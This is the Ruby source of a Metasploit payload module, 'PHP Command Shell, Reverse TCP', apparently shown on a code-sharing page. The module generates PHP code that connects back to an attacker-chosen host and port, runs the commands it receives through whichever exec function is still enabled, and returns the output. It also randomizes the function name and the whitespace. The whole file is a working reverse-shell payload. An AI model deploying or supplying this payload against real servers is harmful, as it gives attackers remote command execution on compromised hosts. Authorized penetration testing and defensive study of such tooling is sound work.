Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = :dynamic
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::Php
13
  include Msf::Sessions::CommandShellOptions
14

15
  def initialize(info = {})
16
    super(merge_info(info,
17
      'Name'          => 'PHP Command Shell, Reverse TCP (via PHP)',
18
      'Description'   => 'Reverse PHP connect back shell with checks for disabled functions',
19
      'Author'        => 'egypt',
20
      'License'       => BSD_LICENSE,
21
      'Platform'      => 'php',
22
      'Arch'          => ARCH_PHP,
23
      'Handler'       => Msf::Handler::ReverseTcp,
24
      'Session'       => Msf::Sessions::CommandShell,
25
      'PayloadType'   => 'cmd',
26
      'Payload'       =>
27
        {
28
          'Offsets' => { },
29
          'Payload' => ''
30
        }
31
      ))
32
  end
33

34
  #
35
  # Issues
36
  #   - Since each command is executed in a new shell, 'cd' does nothing.
37
  #      Perhaps it should be special-cased to call chdir()
38
  #   - Tries to get around disable_functions but makes no attempts to
39
  #      circumvent safe mode.
40
  #
41
  def php_reverse_shell
42

43
    if (!datastore['LHOST'] or datastore['LHOST'].empty?)
44
      # datastore is empty on msfconsole startup
45
      ipaddr = '127.0.0.1'
46
      port = 4444
47
    else
48
      ipaddr = datastore['LHOST']
49
      port = datastore['LPORT']
50
    end
51
    exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)
52

53
    uri = "tcp://#{ipaddr}"
54
    socket_family = "AF_INET"
55

56
    if Rex::Socket.is_ipv6?(ipaddr)
57
      uri = "tcp://[#{ipaddr}]"
58
      socket_family = "AF_INET6"
59
    end
60

61
    shell=<<-END_OF_PHP_CODE
62
    #{php_preamble(disabled_varname: "$dis")}
63
    $ipaddr='#{ipaddr}';
64
    $port=#{port};
65

66
    if(!function_exists('#{exec_funcname}')){
67
      function #{exec_funcname}($c){
68
        global $dis;
69
        #{php_system_block(cmd_varname: "$c", disabled_varname: "$dis", output_varname: "$o")}
70
        return $o;
71
      }
72
    }
73
    $nofuncs='no exec functions';
74
    if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
75
      $s=@fsockopen("#{uri}",$port);
76
      while($c=fread($s,2048)){
77
        $out = '';
78
        if(substr($c,0,3) == 'cd '){
79
          chdir(substr($c,3,-1));
80
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
81
          break;
82
        }else{
83
          $out=#{exec_funcname}(substr($c,0,-1));
84
          if($out===false){
85
            fwrite($s,$nofuncs);
86
            break;
87
          }
88
        }
89
        fwrite($s,$out);
90
      }
91
      fclose($s);
92
    }else{
93
      $s=@socket_create(#{socket_family},SOCK_STREAM,SOL_TCP);
94
      @socket_connect($s,$ipaddr,$port);
95
      @socket_write($s,"socket_create");
96
      while($c=@socket_read($s,2048)){
97
        $out = '';
98
        if(substr($c,0,3) == 'cd '){
99
          chdir(substr($c,3,-1));
100
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
101
          break;
102
        }else{
103
          $out=#{exec_funcname}(substr($c,0,-1));
104
          if($out===false){
105
            @socket_write($s,$nofuncs);
106
            break;
107
          }
108
        }
109
        @socket_write($s,$out,strlen($out));
110
      }
111
      @socket_close($s);
112
    }
113
    END_OF_PHP_CODE
114

115
    # randomize the spaces a bit
116
    Rex::Text.randomize_space(shell)
117

118
    return shell
119
  end
120

121
  #
122
  # Constructs the payload
123
  #
124
  def generate(_opts = {})
125
    return super + php_reverse_shell
126
  end
127
end
128

129